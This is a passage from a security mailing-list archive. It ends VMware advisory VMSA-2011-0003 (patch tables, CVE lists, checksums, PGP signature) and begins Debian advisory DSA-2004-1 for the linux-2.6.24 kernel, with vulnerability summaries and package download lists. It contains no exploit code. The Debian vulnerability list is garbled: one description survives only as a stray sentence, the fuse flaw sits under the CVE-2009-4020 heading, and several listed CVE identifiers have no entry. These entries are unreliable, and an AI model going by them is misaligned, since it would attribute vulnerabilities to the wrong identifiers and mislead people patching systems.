ESX            4.0       ESX      not applicable **
ESX            3.5       ESX      not applicable **
ESX            3.0.3     ESX      not applicable **
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Oracle (Sun) JRE 1.5.0 family

d. vCenter Update Manager Oracle (Sun) JRE is updated to version 1.5.0_26

Oracle (Sun) JRE update to version 1.5.0_26, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,
CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,
CVE-2010-3565,CVE-2010-3568, CVE-2010-3569,  CVE-2009-3555,
CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,
CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,
CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,
CVE-2010-3574.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  not applicable **
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

Update Manager 4.1       Windows  Update 1
Update Manager 4.0       Windows  affected, patch pending
Update Manager 1.0       Windows  affected, no patch planned

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      not applicable **
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      affected, no patch planned
ESX            3.0.3     ESX      affected, no patch planned
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Oracle (Sun) JRE 1.6.0 family

e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28

Apache Tomcat updated to version 6.0.28, which addresses multiple
security issues that existed in earlier releases of Apache Tomcat

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i
and CVE-2009-3548.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  not applicable **

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      not applicable **
ESX            3.0.3     ESX      not applicable **
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Apache Tomcat 5.5 family

f. vCenter Server third party component OpenSSL updated to version 0.9.8n

The version of the OpenSSL library in vCenter Server is updated to
0.9.8n.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-0740 and CVE-2010-0433 to the
issues addressed in this version of OpenSSL.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            any       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

g. ESX third party component OpenSSL updated to version 0.9.8p

The version of the ESX OpenSSL library is updated to 0.9.8p.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-3864 and CVE-2010-2939 to the
issues addressed in this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable
ESXi           4.1       ESXi     ESXi410-201101201-SG
ESXi           4.0       ESXi     affected, patch pending
ESXi           3.5       ESXi     affected, patch pending

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Fusion.

h. ESXi third party component cURL updated

The version of cURL library in ESXi is updated.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-0734 to the issues addressed in
this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           4.1       ESXi     ESXi410-201101201-SG
ESXi           4.0       ESXi     affected, patch pending
ESXi           3.5       ESXi     affected, patch pending

ESX            any       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

i. ESX third party component pam_krb5 updated

The version of pam_krb5 library is updated.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-3825 and CVE-2009-1384 to the
issues addressed in the update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      not affected
ESX            3.5       ESX      not affected
ESX            3.0.3     ESX      not affected
  • hosted products are VMware Workstation, Player, ACE, Fusion.

j. ESX third party update for Service Console kernel

The Service Console kernel is updated to include kernel version
2.6.18-194.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,
CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,
CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,
CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,
CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,
CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,
CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and
CVE-2010-3081 to the issues addressed in the update.

Note: This update also addresses the 64-bit compatibility mode
stack pointer underflow issue identified by CVE-2010-3081. This
issue was patched in an ESX 4.1 patch prior to the release of
ESX 4.1 Update 1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

  • Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

VMware vCenter Server 4.1 Update 1 and modules


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes: http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html

File type: .iso md5sum: 729cf247aa5d33ceec431c86377eee1a sha1sum: c1e10a5fcbc1ae9d13348d43541d574c563d66f0

File type: .zip md5sum: fd1441bef48a153f2807f6823790e2f0 sha1sum: 31737a816ed1c08ab3a505fb6db2483f49ad7c19

VMware vSphere Client File type: .exe md5sum: cb6aa91ada1289575355d79e8c2a9f8e sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESXi 4.1 Installable Update 1


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes:

http://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html http://kb.vmware.com/kb/1027919

File type: .iso MD5SUM: d68d6c2e040a87cd04cd18c04c22c998 SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1) File type: .zip MD5SUM: 2f1e009c046b20042fae3b7ca42a840f SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0) File type: .zip MD5SUM: 67b924618d196dafaf268a7691bd1a0f SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5) File type: .zip MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4 SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488

VMware Tools CD image for Linux Guest OSes File type: .iso MD5SUM: dad66fa8ece1dd121c302f45444daa70 SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af

VMware vSphere Client File type: .exe MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESXi Installable Update 1 contains the following security bulletins: ESXi410-201101201-SG.

ESX 4.1 Update 1


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes:

http://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html http://kb.vmware.com/kb/1029353

ESX 4.1 Update 1 (DVD ISO) File type: .iso md5sum: b9a275b419a20c7bedf31c0bf64f504e sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11

ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1) File type: .zip md5sum: 2d81a87e994aa2b329036f11d90b4c14 sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798

Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1 File type: .zip md5sum: 75f8cebfd55d8a81deb57c27def963c2 sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2

ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0) File type: .zip md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2 sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922

VMware Tools CD image for Linux Guest OSes File type: .iso md5sum: dad66fa8ece1dd121c302f45444daa70 sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af

VMware vSphere Client File type: .exe md5sum: cb6aa91ada1289575355d79e8c2a9f8e sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESX410-Update01 contains the following security bulletins: ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL, Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904 ESX410-201101226-SG (glibc) | http://kb.vmware.com/kb/1031330

ESX410-Update01 also contains the following non-security bulletins ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG, ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG, ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG, ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG, ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG, ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG.

To install an individual bulletin use esxupdate with the -b option.

  1. References

CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2928 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0087 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0089 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0090 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0841 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0843 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0844 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0846 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1157 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0433 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0734 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2066 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2070 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2248 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2524 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0415 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0437 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4308 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0003 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0007 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0307 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1086 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0410 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0730 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0291 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0622 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1087 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1187 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1436 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1641 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574


  1. Change log

2011-02-10 VMSA-2011-0003 Initial security advisory in conjunction with the release of vCenter Server 4.1 Update 1, vCenter Update Manager 4.1 Update 1, ESXi 4.1 Update 1, and ESX 4.1 Update 1 on 2011-02-10.


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories http://www.vmware.com/security/advisories

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2011 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)

iEYEARECAAYFAk1U1eoACgkQS2KysvBH1xm3swCfeh4sWvPOubDT1K7QlRj3SjW9 dxYAmwbNLMR9IG/rKZDYh9hqcf4IldCX =2pVj -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-2004-1 security@debian.org http://www.debian.org/security/ Dann Frazier February 27, 2010 http://www.debian.org/security/faq


Package : linux-2.6.24 Vulnerability : privilege escalation/denial of service/sensitive memory leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2009-2691 CVE-2009-2695 CVE-2009-3080 CVE-2009-3726 CVE-2009-3889 CVE-2009-4005 CVE-2009-4020 CVE-2009-4021 CVE-2009-4138 CVE-2009-4308 CVE-2009-4536 CVE-2009-4538 CVE-2010-0003 CVE-2010-0007 CVE-2010-0291 CVE-2010-0410 CVE-2010-0415 CVE-2010-0622

NOTE: This kernel update marks the final planned kernel security update for the 2.6.24 kernel in the Debian release 'etch'. Although security support for 'etch' officially ended on Feburary 15th, 2010, this update was already in preparation before that date.

Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service, sensitive memory leak or privilege escalation. Local users may be able to read this data for setuid processes while the ELF binary is being loaded.

CVE-2009-2695

Eric Paris provided several fixes to increase the protection
provided by the mmap_min_addr tunable against NULL pointer
dereference vulnerabilities.

CVE-2009-3080

Dave Jones reported an issue in the gdth SCSI driver. A missing
check for negative offsets in an ioctl call could be exploited by
local users to create a denial of service or potentially gain
elevated privileges.

CVE-2009-3726

Trond Myklebust reported an issue where a malicious NFS server
could cause a denial of service condition on its clients by
returning incorrect attributes during an open call.

CVE-2009-3889

Joe Malicki discovered an issue in the megaraid_sas driver. 
Insufficient permissions on the sysfs dbg_lvl interface allow
local users to modify the debug logging behavior.

CVE-2009-4005

Roel Kluin discovered an issue in the hfc_usb driver, an ISDN
driver for Colognechip HFC-S USB chip. A potential read overflow
exists which may allow remote users to cause a denial of service
condition (oops).

CVE-2009-4020

Amerigo Wang discovered an issue in the HFS filesystem that would
allow a denial of service by a local user who has sufficient
privileges to mount a specially crafted filesystem. Avati discovered an issue in the fuse subsystem. If the
system is sufficiently low on memory, a local user can cause the
kernel to dereference an invalid pointer resulting in a denial of
service (oops) and potentially an escalation of privileges.  For this to be exploitable, the local user must
have sufficient privileges to mount a filesystem.

CVE-2009-4536 & CVE-2009-4538

Fabian Yamaguchi reported issues in the e1000 and e1000e drivers
for Intel gigabit network adapters which allow remote users to
bypass packet filters using specially crafted Ethernet frames.

CVE-2010-0003

Andi Kleen reported a defect which allows local users to gain read
access to memory reachable by the kernel when the
print-fatal-signals option is enabled. This option is disabled by
default.

CVE-2010-0007

Florian Westphal reported a lack of capability checking in the
ebtables netfilter subsystem. If the ebtables module is loaded,
local users can add and modify ebtables rules.

CVE-2010-0410

 Sebastian Krahmer discovered an issue in the netlink connector
 subsystem that permits local users to allocate large amounts of
 system memory resulting in a denial of service (out of memory).

CVE-2010-0415

Ramon de Carvalho Valle discovered an issue in the sys_move_pages
interface, limited to amd64, ia64 and powerpc64 flavors in Debian.

CVE-2010-0622

Jermome Marchand reported an issue in the futex subsystem that
allows a local user to force an invalid futex state which results
in a denial of service (oops).

For the oldstable distribution (etch), this problem has been fixed in version 2.6.24-6~etchnhalf.9etch3.

We recommend that you upgrade your linux-2.6.24 packages.

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch


Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc Size/MD5 checksum: 5118 e05bb21e7655cbfa39aed8d4fd6842eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz Size/MD5 checksum: 4099250 127bad8d653046d37fc52115d4e3a332 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af

Architecture independent packages:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 4263554 6c56ff077d17eba766af47544ce0f414 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 83890 62cfd18ed176359831502e70d80b291a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 46871628 328ad30d3c07f90c56d821f76e186b40 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 1550090 1f114fdc3123f135017dbdcd0e4839c6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 1009878 c7b7abff092940a400703b9168e46daa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 98248 a2a391008f8855d8358d5f18d9d76044

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329786 a212d2b3a94f8a04611c0f20d3d324b9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 27236282 b5bc553c4bf3a49843c45814fab72443 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 83428 f5f27b9de4905239e6315c77393f1f03 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 83454 5d152b5b6aa505982ebc7122a770b29b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 26641900 c799e7d48937975036b46edf032ecd87 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 26620162 eb1c3c27f1ac81959dc0f2ab497aee35 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 3455268 da2d2cc2b7c4253ac408c30fcfddb28f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329788 f589f8815f7adf02f8884e2dd3ac613f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329336 14bf085655b30adc8ab8f6ed4207d415

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 19482308 c49d2962c1a391fb00fb1b5f0598b24e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 3656476 f2f5de65037664d03208fcea83bf2ee2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 83422 600c7216143f43f9c61b0c2ccd118ea0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 83434 36f1d8f21ec39a473536dbeda2332e62 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 346940 d3f12fdd61f90749fdd08d857b326327

arm architecture (ARM)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 9357734 3e1165a0795d7db5f7ed8ef84205064b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 298744 50d8bfa3c06134e190409399a36c5aa9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 83546 1742ab93afadd1827009bf1d714e76eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 83578 07906e33f9ad267d986991c93eef1048 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 10778670 cc38a718ad5fd1c6e92d23e416610bd6 